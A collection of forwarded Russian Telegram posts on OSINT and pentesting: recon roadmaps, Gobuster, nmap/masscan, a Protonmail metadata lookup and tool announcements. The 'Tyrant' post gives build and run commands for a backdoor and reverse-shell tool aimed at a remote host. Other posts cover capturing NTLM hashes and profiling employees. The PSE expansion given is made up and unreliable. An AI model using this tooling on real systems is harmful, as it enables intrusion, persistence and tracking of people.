Forwarded from Интернет-Розыск
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Пентестинг. Этичный хакинг.
🔎 Пассивная разведка сайта: как собрать инфу, не трогая цель разбираем тему, как и как и обещали в чате
Большинство думает, что пентест начинается со сканеров.
На деле — всё начинается с пассивной разведки.
👉 Пассивная разведка — это сбор информации БЕЗ взаимодействия с целью
(ты не отправляешь запросы на сервер)
Почему это важно?
— тебя не видно в логах
— можно найти уязвимости ещё до атаки
— формируется картина цели
📦 Что можно узнать:
• домены и поддомены
• IP-адреса
• используемые технологии
• открытые данные (утечки, репозитории)
• почты сотрудников
🛠 Инструменты:
— Amass
— theHarvester
— Shodan
— Censys
💡 Пример:
Ты находишь поддомен вида:
А там — тестовая среда без защиты. Уже можно черпать очень много информации.
Также, хотел бы вам посоветовать отличный репозиторий, содержащий перечень инструментов и ресурсов для сбора информации из открытых источников (OSINT).
🪧Информация о компании, которая может быть полезной:
Услуги — чем занимается компания?
Местоположение — где расположена компания?
Размер — какого размера компания?
Структура — какова структура компании и как взаимодействуют различные отделы?
Известность — насколько хорошо известна компания в мире?
Целевая аудитория — кому компания предоставляет свои услуги?
Маркетинг — как компания рекламирует свои услуги?
Активы — все ресурсы компании (офисы, веб-сайты, сетевая инфраструктура и т. д.).
Безопасность — какие меры безопасности предусмотрены для защиты активов компании?
Партнёры — с кем сотрудничает компания?
Вакансии — открыты ли вакансии в компании?
Полезная информация о сотруднике:
Должность — какие роли и обязанности выполняет сотрудник?
Зависимости — какие функциональные или рабочие зависимости существуют у сотрудника?
Контактные данные — номер телефона, адрес электронной почты, место проживания, псевдонимы и т.д.
Операционная система — какую операционную систему использует сотрудник для работы?
Активы — есть ли у сотрудника веб-сайт, блог, аккаунты в социальных сетях или какие-либо специфические приложения?
Интересы — какие у сотрудника личные увлечения, хобби или области интересов вне рабочих обязанностей?
Связи — с кем связан сотрудник?
🎯 Итог:
Пассивная разведка — это не просто этап «перед началом»,
это фундамент всей дальнейшей атаки.
Чем лучше ты собрал информацию на старте —
тем меньше тебе придётся «шуметь» дальше.
👉 Здесь решает не количество инструментов,
а умение связывать факты:
💡 кто хорошо делает OSINT —
тот уже на шаг впереди ещё до первого запроса к цели.
#osint #recon #пассивнаяраздведка
Большинство думает, что пентест начинается со сканеров.
На деле — всё начинается с пассивной разведки.
👉 Пассивная разведка — это сбор информации БЕЗ взаимодействия с целью
(ты не отправляешь запросы на сервер)
Почему это важно?
— тебя не видно в логах
— можно найти уязвимости ещё до атаки
— формируется картина цели
📦 Что можно узнать:
• домены и поддомены
• IP-адреса
• используемые технологии
• открытые данные (утечки, репозитории)
• почты сотрудников
🛠 Инструменты:
— Amass
— theHarvester
— Shodan
— Censys
💡 Пример:
Ты находишь поддомен вида:
dev.example.com
А там — тестовая среда без защиты. Уже можно черпать очень много информации.
Также, хотел бы вам посоветовать отличный репозиторий, содержащий перечень инструментов и ресурсов для сбора информации из открытых источников (OSINT).
🪧Информация о компании, которая может быть полезной:
Услуги — чем занимается компания?
Местоположение — где расположена компания?
Размер — какого размера компания?
Структура — какова структура компании и как взаимодействуют различные отделы?
Известность — насколько хорошо известна компания в мире?
Целевая аудитория — кому компания предоставляет свои услуги?
Маркетинг — как компания рекламирует свои услуги?
Активы — все ресурсы компании (офисы, веб-сайты, сетевая инфраструктура и т. д.).
Безопасность — какие меры безопасности предусмотрены для защиты активов компании?
Партнёры — с кем сотрудничает компания?
Вакансии — открыты ли вакансии в компании?
Полезная информация о сотруднике:
Должность — какие роли и обязанности выполняет сотрудник?
Зависимости — какие функциональные или рабочие зависимости существуют у сотрудника?
Контактные данные — номер телефона, адрес электронной почты, место проживания, псевдонимы и т.д.
Операционная система — какую операционную систему использует сотрудник для работы?
Активы — есть ли у сотрудника веб-сайт, блог, аккаунты в социальных сетях или какие-либо специфические приложения?
Интересы — какие у сотрудника личные увлечения, хобби или области интересов вне рабочих обязанностей?
Связи — с кем связан сотрудник?
🎯 Итог:
Пассивная разведка — это не просто этап «перед началом»,
это фундамент всей дальнейшей атаки.
Чем лучше ты собрал информацию на старте —
тем меньше тебе придётся «шуметь» дальше.
👉 Здесь решает не количество инструментов,
а умение связывать факты:
один поддомен → один email → один сотрудник → одна точка входа
💡 кто хорошо делает OSINT —
тот уже на шаг впереди ещё до первого запроса к цели.
#osint #recon #пассивнаяраздведка
Forwarded from Пентестинг. Этичный хакинг.
🔎 Мини-алгоритм пассивной разведки (OSINT)
Чтобы не тонуть в инструментах — я постарался обобщить все в мини-роудмап:
1️⃣ Определи цель
— домен / компания / ник
— зафиксируй все варианты (зеркала, поддомены, похожие названия)
2️⃣ Собери поверхность атаки
— домены и поддомены
— IP и хосты
— связанные сервисы
(через Amass, Censys)
3️⃣ Определи технологии
— CMS / фреймворки
— версии сервисов
— сторонние интеграции
4️⃣ Ищи открытые источники
— репозитории
— утечки
— документы
— кэш поисковиков
(через theHarvester, Shodan)
5️⃣ Собери людей и доступы
— сотрудники
— почты
— роли
— соцсети
6️⃣ Найди слабые точки
— dev / test / staging
— старые версии сайтов
— забытые сервисы
— лишняя информация в открытом доступе
7️⃣ Сделай pivot
— email → аккаунты
— домен → поддомены
— человек → компания → инфраструктура
🎯 Итог:
Пассивка — это не просто сбор данных,
а последовательная сборка пазла.
#osint #recon #пассивнаяраздведка
Чтобы не тонуть в инструментах — я постарался обобщить все в мини-роудмап:
1️⃣ Определи цель
— домен / компания / ник
— зафиксируй все варианты (зеркала, поддомены, похожие названия)
2️⃣ Собери поверхность атаки
— домены и поддомены
— IP и хосты
— связанные сервисы
(через Amass, Censys)
3️⃣ Определи технологии
— CMS / фреймворки
— версии сервисов
— сторонние интеграции
4️⃣ Ищи открытые источники
— репозитории
— утечки
— документы
— кэш поисковиков
(через theHarvester, Shodan)
5️⃣ Собери людей и доступы
— сотрудники
— почты
— роли
— соцсети
6️⃣ Найди слабые точки
— dev / test / staging
— старые версии сайтов
— забытые сервисы
— лишняя информация в открытом доступе
7️⃣ Сделай pivot
— email → аккаунты
— домен → поддомены
— человек → компания → инфраструктура
🎯 Итог:
Пассивка — это не просто сбор данных,
а последовательная сборка пазла.
#osint #recon #пассивнаяраздведка
Forwarded from Интернет-Розыск
Программируемая поисковая система Google PSE, ранее известная как Custom Search Engine (CSE), — это малоиспользуемый, но мощный инструмент для OSINT-расследований.
📎 https://programmablesearchengine.google.com/
PSE (Personal Service Except — поисковая оптимизация) — это ваша собственная, тщательно отобранная версия Google. Вместо поиска по всему интернету, она ищет только на конкретных сайтах, доменах или страницах, которые вы выберете. Google занимается индексированием в фоновом режиме, а вы определяете область поиска.
Подборки Google PSE для OSINT:
📎 https://github.com/paulpogoda/OSINT-CSE
📎 https://github.com/The-Osint-Toolbox/Custom-Search-Engines
📎 https://www.freesourcingtools.com/google-cse
📎 https://booleanstrings.com/all-the-40-forty-custom-search-engines/
📱 Telegram | 🌐 ВК | 📲 MAX
PSE (Personal Service Except — поисковая оптимизация) — это ваша собственная, тщательно отобранная версия Google. Вместо поиска по всему интернету, она ищет только на конкретных сайтах, доменах или страницах, которые вы выберете. Google занимается индексированием в фоновом режиме, а вы определяете область поиска.
Подборки Google PSE для OSINT:
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Пентестинг. Этичный хакинг.
⚔️ Активная разведка сайта: когда ты начинаешь “стучаться” в цель
Если пассивка — это наблюдение,
то активная разведка — это уже действие.
👉 Активная разведка — это взаимодействие с целью
(ты отправляешь запросы → система может тебя заметить)
Почему это важно?
— получаешь реальные ответы от сервера
— находишь уязвимости, которые не видны в OSINT
— проверяешь гипотезы, собранные на пассивке
⚠️ Но есть нюанс:
— ты оставляешь следы в логах
— можешь триггернуть WAF / IDS
— без разрешения это может быть незаконно
📦 Что сюда входит:
• сканирование портов
• перебор директорий и файлов
• fuzzing параметров
• анализ ответов сервера
• поиск точек входа
🛠 Инструменты:
— Nmap
— Gobuster
— ffuf
— Burp Suite
💡 Пример:
Ты находишь поддомен через пассивку →
Дальше:
— сканируешь порты
— находишь admin-панель
— проверяешь параметры
И вот тут уже начинаются реальные уязвимости
🎯 Важно:
Активка без пассивки = стрельба в темноту
Активка после пассивки = точечный удар
#osint #активнаяраздведка
Если пассивка — это наблюдение,
то активная разведка — это уже действие.
👉 Активная разведка — это взаимодействие с целью
(ты отправляешь запросы → система может тебя заметить)
Почему это важно?
— получаешь реальные ответы от сервера
— находишь уязвимости, которые не видны в OSINT
— проверяешь гипотезы, собранные на пассивке
⚠️ Но есть нюанс:
— ты оставляешь следы в логах
— можешь триггернуть WAF / IDS
— без разрешения это может быть незаконно
📦 Что сюда входит:
• сканирование портов
• перебор директорий и файлов
• fuzzing параметров
• анализ ответов сервера
• поиск точек входа
🛠 Инструменты:
— Nmap
— Gobuster
— ffuf
— Burp Suite
💡 Пример:
Ты находишь поддомен через пассивку →
test.example.com
Дальше:
— сканируешь порты
— находишь admin-панель
— проверяешь параметры
И вот тут уже начинаются реальные уязвимости
🎯 Важно:
Активка без пассивки = стрельба в темноту
Активка после пассивки = точечный удар
#osint #активнаяраздведка
Forwarded from Пентестинг. Этичный хакинг.
🔎 Мини-алгоритм активной разведки (OSINT)
1️⃣ Берёшь данные с пассивки
— домены, поддомены
— IP и сервисы
— найденные dev/test точки
2️⃣ Проверяешь доступность
— какие хосты отвечают
— какие порты открыты
— какие сервисы реально доступны
👉 Отсекаешь всё лишнее
3️⃣ Определяешь сервисы
— сайт, API, админка?
— какие технологии используются
— есть ли WAF / защита
👉 Понимаешь, с чем имеешь дело
4️⃣ Ищешь скрытые директории
— /admin
— /login
— /api
— /backup
— /dev
👉 Очень часто здесь лежит самое интересное
5️⃣ Анализируешь ответы сервера
— коды ответов (200/403/404)
— размер ответа
— заголовки
— поведение при разных запросах
👉 Ищешь аномалии
6️⃣ Проверяешь точки ввода
— формы
— параметры
— API
— загрузки файлов
👉 Смотришь, как система обрабатывает данные
7️⃣ Тестируешь поведение
— нестандартные значения
— разные методы
— изменение запросов
👉 Ловишь ошибки логики
8️⃣ Выделяешь точки входа
— админки
— авторизация
— API
— старые сервисы
👉 Формируешь векторы атаки
🎯 Вывод:
Активная разведка — это не “запустить сканер и ждать”.
Это последовательная работа с гипотезами,
где каждый шаг сужает область поиска.
#osint #активнаяраздведка
1️⃣ Берёшь данные с пассивки
— домены, поддомены
— IP и сервисы
— найденные dev/test точки
2️⃣ Проверяешь доступность
— какие хосты отвечают
— какие порты открыты
— какие сервисы реально доступны
👉 Отсекаешь всё лишнее
3️⃣ Определяешь сервисы
— сайт, API, админка?
— какие технологии используются
— есть ли WAF / защита
👉 Понимаешь, с чем имеешь дело
4️⃣ Ищешь скрытые директории
— /admin
— /login
— /api
— /backup
— /dev
👉 Очень часто здесь лежит самое интересное
5️⃣ Анализируешь ответы сервера
— коды ответов (200/403/404)
— размер ответа
— заголовки
— поведение при разных запросах
👉 Ищешь аномалии
6️⃣ Проверяешь точки ввода
— формы
— параметры
— API
— загрузки файлов
👉 Смотришь, как система обрабатывает данные
7️⃣ Тестируешь поведение
— нестандартные значения
— разные методы
— изменение запросов
👉 Ловишь ошибки логики
8️⃣ Выделяешь точки входа
— админки
— авторизация
— API
— старые сервисы
👉 Формируешь векторы атаки
🎯 Вывод:
Активная разведка — это не “запустить сканер и ждать”.
Это последовательная работа с гипотезами,
где каждый шаг сужает область поиска.
#osint #активнаяраздведка
Forwarded from Codeby
Tyrant
📐 Основные характеристики:
📉 Reverse shell: позволяет злоумышленнику инициировать сеанс командной оболочки с указанным UID пользователя, получая соответствующие привилегии.
📉 Внедрение и сохранение бэкдора: внедряет бэкдор в целевую систему и обеспечивает сохранение контроля даже после перезагрузки системы.
📉 Загрузка веб-оболочки Tyrant: загружает и запускает обратную оболочку Tyrant через веб-доступ.
📉 Шифрование и поддельные протоколы: использует поддельные токены JWT и зашифрованную связь для обхода обнаружения системы безопасности.
🖱 Восстановление по SSH: позволяет злоумышленнику повторно подключиться и восстановить бэкдор через SSH.
⬇️ Установка:
0️⃣ Клонирование репозитория и переход в рабочую директорию:
1️⃣ Установка зависимостей:
2️⃣ Компиляция бинарного файла:
⛓️💥 Запуск:
#web
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Tyrant — это вредоносный инструмент, используемый для тестирования на проникновение и обеспечения постоянного присутствия под удаленным управлением, обладающий обширными возможностями.
git clone https://github.com/MartinxMax/Tyrant.git
cd Tyrant/
sudo apt-get install zlib1g-dev libzstd-dev libssl-dev
gcc -static -o tyrant tyrant.c ./lib/core.c ./lib/random_md5.c -lssl -lcrypto -lz -lzstd
./tyrant -uid [UID] -rhost [RHOST] -rport [RPORT]
#web
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Пентестинг. Этичный хакинг.
🛠 Gobuster: как находить скрытые директории и поддомены
Одна из самых частых ошибок новичков —
думать, что если страница не видна, значит её нет.
👉 На практике —она просто скрыта .
📌 Gobuster:
— перебирает директории (
— ищет скрытые файлы
— может находить поддомены
💡 Пример:
📦 Что можно найти:
• админ-панели
• тестовые разделы
• резервные копии
• скрытые API
• забытые страницы
⚡️ Важно:
— хороший словарь = 50% успеха
— не все 200 ответы полезны
— обращай внимание на размер ответа
— фильтруй мусор
💣 Частая ошибка:
Запустить Gobuster “в лоб” без пассивки
👉 Запомни:
сначала собрать поддомены →
потом уже брутить директории точечно
🔥 Мини-лайфхаки:
— проверяй
— используй разные словари
— смотри не только на статус, но и на контент
— ищи нестандартные ответы
🎯 Вывод:
Gobuster — это не просто перебор слов,
а инструмент для поиска скрытых точек входа.
#tools #gobuster
Одна из самых частых ошибок новичков —
думать, что если страница не видна, значит её нет.
👉 На практике —
📌 Gobuster:
— перебирает директории (
/admin, /backup, /dev)— ищет скрытые файлы
— может находить поддомены
💡 Пример:
gobuster dir -u http://target.com -w wordlist.txt
📦 Что можно найти:
• админ-панели
• тестовые разделы
• резервные копии
• скрытые API
• забытые страницы
⚡️ Важно:
— хороший словарь = 50% успеха
— не все 200 ответы полезны
— обращай внимание на размер ответа
— фильтруй мусор
💣 Частая ошибка:
Запустить Gobuster “в лоб” без пассивки
👉 Запомни:
сначала собрать поддомены →
потом уже брутить директории точечно
🔥 Мини-лайфхаки:
— проверяй
/robots.txt перед запуском— используй разные словари
— смотри не только на статус, но и на контент
— ищи нестандартные ответы
🎯 Вывод:
Gobuster — это не просто перебор слов,
а инструмент для поиска скрытых точек входа.
#tools #gobuster
Forwarded from Интернет-Розыск
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Cyber Detective
Best OSINT resources
List by OsintTeamBlog (updated last month):
Youtube channels
Newsletters
Blogs
Podcasts
CTFs and hackathons
https://www.osintteam.com/resources/
List by OsintTeamBlog (updated last month):
Youtube channels
Newsletters
Blogs
Podcasts
CTFs and hackathons
https://www.osintteam.com/resources/
Forwarded from Интернет-Розыск
Меня часто спрашивают: можно ли хоть что-то узнать об анонимном почтовом ящике Protonmail, кроме самого адреса? Короткий ответ — да, кое-что можно. Не пароль, не переписку, конечно, но технические метаданные — вполне.
Сегодня покажу простой способ получить дату и время создания ящика. Это не взлом и не «пробив» в классическом понимании, а легальный запрос к открытому API Protonmail. Такая информация бывает полезна в расследовании: например, вы видите, что ящик создан через час после какого-то события, или, наоборот, существовал уже несколько лет. Цепочка косвенных улик иногда говорит больше, чем прямой ответ. Метод работает для большинства активных ящиков Protonmail, если пользователь не отключил публичный PGP-ключ (по умолчанию он включён).
Пусть у нас есть ящик: gabaigaduka@protonmail.com. Мы не знаем, кто за ним стоит, но хотим понять, когда его зарегистрировали. Protonmail предоставляет публичный эндпоинт для проверки PGP-ключей. В том числе через него можно получить метаинформацию о ящике. Вбиваем в браузере или через curl такой URL:
В ответ приходит несколько строк. Нас интересует та, что начинается с pub:. В ней есть числовая метка — Unix timestamp.
Видите число 1527584191? Это и есть время создания ящика в секундах, прошедших с 1 января 1970 года. Только выглядит оно не очень читаемо. Идём на сайт epochconverter.com (или любой другой онлайн-конвертер Unix timestamp). Вставляем туда 1527584191 и получаем 29 мая 2018 года, около 15:36 по UTC. То есть ящик создан в конце весны 2018-го. Уже что-то.
📱 Telegram | 🌐 ВК | 📲 MAX
Сегодня покажу простой способ получить дату и время создания ящика. Это не взлом и не «пробив» в классическом понимании, а легальный запрос к открытому API Protonmail. Такая информация бывает полезна в расследовании: например, вы видите, что ящик создан через час после какого-то события, или, наоборот, существовал уже несколько лет. Цепочка косвенных улик иногда говорит больше, чем прямой ответ. Метод работает для большинства активных ящиков Protonmail, если пользователь не отключил публичный PGP-ключ (по умолчанию он включён).
Пусть у нас есть ящик: gabaigaduka@protonmail.com. Мы не знаем, кто за ним стоит, но хотим понять, когда его зарегистрировали. Protonmail предоставляет публичный эндпоинт для проверки PGP-ключей. В том числе через него можно получить метаинформацию о ящике. Вбиваем в браузере или через curl такой URL:
https://api.protonmail.ch/pks/lookup?op=index&search=gabaigaduka@protonmail.com
В ответ приходит несколько строк. Нас интересует та, что начинается с pub:. В ней есть числовая метка — Unix timestamp.
info:1:1
pub:cc0322777176da3a4a4d9916e4f32c96c55663a4:1:2048:1527584191::
uid:gabaigaduka@protonmail.com <gabaigaduka@protonmail.com>:1527584191::
Видите число 1527584191? Это и есть время создания ящика в секундах, прошедших с 1 января 1970 года. Только выглядит оно не очень читаемо. Идём на сайт epochconverter.com (или любой другой онлайн-конвертер Unix timestamp). Вставляем туда 1527584191 и получаем 29 мая 2018 года, около 15:36 по UTC. То есть ящик создан в конце весны 2018-го. Уже что-то.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Интернет-Розыск
Сколько раз мы с вами сталкивались с одной и той же проблемой: нужно быстро подобрать инструмент под конкретную задачу, а в закладках — сотни ссылок, половина из которых мертва, а вторая — просто бесполезна. Где-то лежит один парсер, где-то — другой, а вспомнить, чем ты пользовался в прошлом кейсе, уже нереально.
The OSINT Tools Library — tools.osintnewsletter.com
📱 Telegram | 🌐 ВК | 📲 MAX
The OSINT Tools Library — tools.osintnewsletter.com
Это не очередная простыня из «100500 инструментов для всех случаев». Авторы подошли к делу с практической стороны: каталог курируется под конкретные задачи расследователя. Внутри — только то, что реально применялось в делах, а не скопировано с соседнего сайта.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Codeby
Qu1cksc0pe: Многофункциональный инструмент для статического и динамического анализа вредоносного ПО
🧿 Поддерживаемые форматы файлов
- Windows (.exe, .dll, .msi, .bin)
- Linux (.elf, .bin)
- macOS (mach-o)
- Android (.apk, .jar, .dex)
- Документы (.doc, .docm, .docx, .xls, .xlsx, .pdf, .rtf, .one)
- Скрипты (VBScript/VBA (.vbs, .vbe, .vba), PowerShell)
- Архивы (.zip, .rar)
⬇️ Установка
Проверка
⏺️ Базовый анализ
⏺️ Быстрый анализ подозрительного EXE-файла
⏺️ Глубокий анализ документа с извлечением макросов
⏺️ Проверка APK на наличие вредоносного поведения
⏺️ Пакетное сканирование коллекции образцов
⏺️ Извлечение индикаторов компрометации
#Qu1cksc0pe #StaticAnalysis #DynamicAnalysis #tool #pentest #MITRE
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Qu1cksc0pe — это универсальная платформа с открытым исходным кодом для статического и динамического анализа вредоносного программного обеспечения. Инструмент предназначен для исследования широкого спектра файлов: от исполняемых binaries Windows, Linux и macOS до документов, APK-файлов, архивов и сценариев PowerShell. Основная цель — предоставить исследователям безопасности максимальный объем информации о подозрительных файлах, помогая понять их функциональность и потенциальные угрозы.
- Windows (.exe, .dll, .msi, .bin)
- Linux (.elf, .bin)
- macOS (mach-o)
- Android (.apk, .jar, .dex)
- Документы (.doc, .docm, .docx, .xls, .xlsx, .pdf, .rtf, .one)
- Скрипты (VBScript/VBA (.vbs, .vbe, .vba), PowerShell)
- Архивы (.zip, .rar)
pipх install quickscope
Проверка
quickscope -h
python quickscope --file suspicious_file.exe --analyze
python quickscope --file unknown_sample.exe --analyze --vtFile
python quickscope --file invoice.doc --docs
#cтатический анализ
python quickscope --file malicious.apk --analyze
#динамический анализ (с подключенным устройством)
python quickscope --file malicious.apk --watch
python quickscope --folder ./malware_collection --hashscan
python quickscope --file suspicious_sample.exe --analyze --report | jq '.iocs'
#Qu1cksc0pe #StaticAnalysis #DynamicAnalysis #tool #pentest #MITRE
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Soxoj insides (Soxoj)
🎭 ShareTrace: reveal the identity behind any share link
Works for 12 platforms: TikTok, Instagram, Discord, Google Drive, Notion, Telegram, Pinterest, Substack, Suno, ChatGPT, Claude, Perplexity.
Original repo was deleted — I rebuilt it with new platforms and fixes.
👉 https://github.com/soxoj/sharetrace
Works for 12 platforms: TikTok, Instagram, Discord, Google Drive, Notion, Telegram, Pinterest, Substack, Suno, ChatGPT, Claude, Perplexity.
Original repo was deleted — I rebuilt it with new platforms and fixes.
👉 https://github.com/soxoj/sharetrace
Forwarded from Заметки Хакер
🖥 Репозиторий: Dronesploit — фреймворк для пентестинга и эксплуатации уязвимостей дронов
Dronesploit — это комплексный набор инструментов и фреймворк, разработанный для анализа безопасности беспилотных летательных аппаратов (БПЛА).
— Он предоставляет исследователям безопасности и пентестерам средства для выявления, изучения и эксплуатации потенциальных уязвимостей в системах дронов, а также для оценки их защищенности от различных атак.
Включает модули для разведки, сканирования и эксплуатации различных протоколов связи дронов; поддерживает множество производителей и моделей БПЛА; предоставляет инструменты для перехвата данных, спуфинга GPS и других методов атаки; предназначен для этичного тестирования безопасности и научных исследований.
⏺ Ссылка на GitHub (https://github.com/dronesploit/dronesploit)
#Cybersecurity #IoT #Pentest #Hacking #OpenSource #Drone | Лаборатория хакера (https://max.ru/lab_hack)
@hackernews_lib
Dronesploit — это комплексный набор инструментов и фреймворк, разработанный для анализа безопасности беспилотных летательных аппаратов (БПЛА).
— Он предоставляет исследователям безопасности и пентестерам средства для выявления, изучения и эксплуатации потенциальных уязвимостей в системах дронов, а также для оценки их защищенности от различных атак.
Включает модули для разведки, сканирования и эксплуатации различных протоколов связи дронов; поддерживает множество производителей и моделей БПЛА; предоставляет инструменты для перехвата данных, спуфинга GPS и других методов атаки; предназначен для этичного тестирования безопасности и научных исследований.
⏺ Ссылка на GitHub (https://github.com/dronesploit/dronesploit)
#Cybersecurity #IoT #Pentest #Hacking #OpenSource #Drone | Лаборатория хакера (https://max.ru/lab_hack)
@hackernews_lib
Forwarded from Codeby
WebSift
📐 Функции
📉 Собирает адреса электронной почты с заданного веб-сайта.
📉 Извлекает номера телефонов в стандартных форматах.
📉 Собирает ссылки на социальные сети и другие URL-адреса с веб-сайтов для расширения возможностей OSINT.
🖱 Сохраняет извлеченную информацию для дальнейшего анализа.
⬇️ Установка:
🔗 Клонируем репозиторий и переходим в рабочую директорию:
⛓️💥 Запуск:
#web #pentest #OSINT
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
WebSift — это мощный инструмент для этичного хакинга и OSINT, предназначенный для извлечения адресов электронной почты, номеров телефонов, ссылок на социальные сети и другие ссылки с веб-сайтов. Он разработан для систем на базе Termux и Linux. Этот инструмент идеально подходит для специалистов по безопасности и исследователей, которым необходимо собирать общедоступную информацию в этических и правовых целях.
git clone https://github.com/s-r-e-e-r-a-j/WebSift.git
cd WebSift/
cd WebSift/
bash websift.sh
#web #pentest #OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Codeby
🔍 80% успешных атак рождаются до запуска эксплойта
Эксплойт — вишенка. Разведка — весь торт. Пять лет пентестов подтверждают: кто криво просканировал периметр — дальше можно не продолжать.
🛠 Цепочка из четырёх инструментов для полного цикла разведки:
1. masscan — прочёсывает /16-подсети за минуты, но с
2. nmap — верифицирует результаты и вытаскивает версии сервисов (masscan даёт ложноположительные)
3. tcpdump — перехватывает NTLM-хэши и пароли в открытом трафике пассивно
4. netcat — баннеры, проверка портов, простые туннели
💡 Каждый шаг привязан к технике MITRE ATT&CK — это сразу поднимает уровень отчёта. Заказчик видит не «открытый порт», а «Network Service Discovery (T1046)» с критичностью и вектором.
Полный разбор с командами, типичными ошибками джуниоров и готовыми сценариями:
https://codeby.net/threads/setevaya-razvedka-iz-linux-nmap-masscan-netcat-i-tcpdump-prakticheskiye-stsenarii-dlya-pentesta.92622/
Эксплойт — вишенка. Разведка — весь торт. Пять лет пентестов подтверждают: кто криво просканировал периметр — дальше можно не продолжать.
🛠 Цепочка из четырёх инструментов для полного цикла разведки:
1. masscan — прочёсывает /16-подсети за минуты, но с
--rate=1000 — иначе положишь клиентскую сеть2. nmap — верифицирует результаты и вытаскивает версии сервисов (masscan даёт ложноположительные)
3. tcpdump — перехватывает NTLM-хэши и пароли в открытом трафике пассивно
4. netcat — баннеры, проверка портов, простые туннели
💡 Каждый шаг привязан к технике MITRE ATT&CK — это сразу поднимает уровень отчёта. Заказчик видит не «открытый порт», а «Network Service Discovery (T1046)» с критичностью и вектором.
Полный разбор с командами, типичными ошибками джуниоров и готовыми сценариями:
https://codeby.net/threads/setevaya-razvedka-iz-linux-nmap-masscan-netcat-i-tcpdump-prakticheskiye-stsenarii-dlya-pentesta.92622/
Forwarded from Russian OSINT
Старший инженер по исследованиям в области безопасности Дай Нгуен и штатный инженер-исследователь Мартин Баяник недавно обнаружили уязвимость, связанную с конфиденциальностью, затрагивающую все браузеры на базе Firefox и позволяющую веб-сайтам получать уникальный, так называемый детерминированный и стабильный
indexedDB.databases() веб-сайты могут получить уникальный «цифровой отпечаток», который связывает действия пользователя на разных ресурсах в течение времени работы одного процесса браузера. В луковом браузере идентификатор сохраняется даже после использования функции 👨🏻💻«Новая личность», которая должна полностью обнулять историю и сессии для предотвращения отслеживания.Техническая причина проблемы заключается в том, что в приватном режиме Firefox сопоставляет имена баз данных с UUID через глобальную хеш-таблицу, общую для всех сайтов. Порядок, в котором API возвращает список этих баз, зависит от внутренней структуры таблицы и остается неизменным, пока процесс браузера не будет полностью перезапущен. Таким образом, кажущийся нейтральным порядок выдачи данных превращается в детерминированный инструмент идентификации, обладающий высокой емкостью — 16 имен баз данных дают около 44 бит энтропии, чего более чем достаточно для точного отслеживания конкретного экземпляра браузера.
Мы ответственно сообщили об этой проблеме компаниям Mozilla и Tor Project. Mozilla оперативно выпустила исправление в Firefox 150 и ESR 140.10.0; патч отслеживается в баг-трекере Mozilla под номером 2024220. Основная причина уязвимости унаследована Tor Browser через реализацию IndexedDB в движке Gecko, поэтому проблема актуальна для обоих продуктов и для всех браузеров на базе Firefox.
— сообщают исследователи.
Разработчики устранили проблему в Firefox 150, внедрив принудительную канонизацию (сортировку) результатов API перед их возвратом, лишив сайты возможности извлекать идентифицирующую информацию из порядка данных.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from GitHub Community
Web-Check — это бесплатный инструмент с открытым исходным кодом, который быстро сканирует любой веб-сайт, чтобы выявить информацию об IP, детали SSL, записи DNS, заголовки безопасности, открытые порты, технологический стек, производительность, трекеры, углеродный след и многое другое, помогая выявлять уязвимости и риски атак.
🐱 GitHub
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1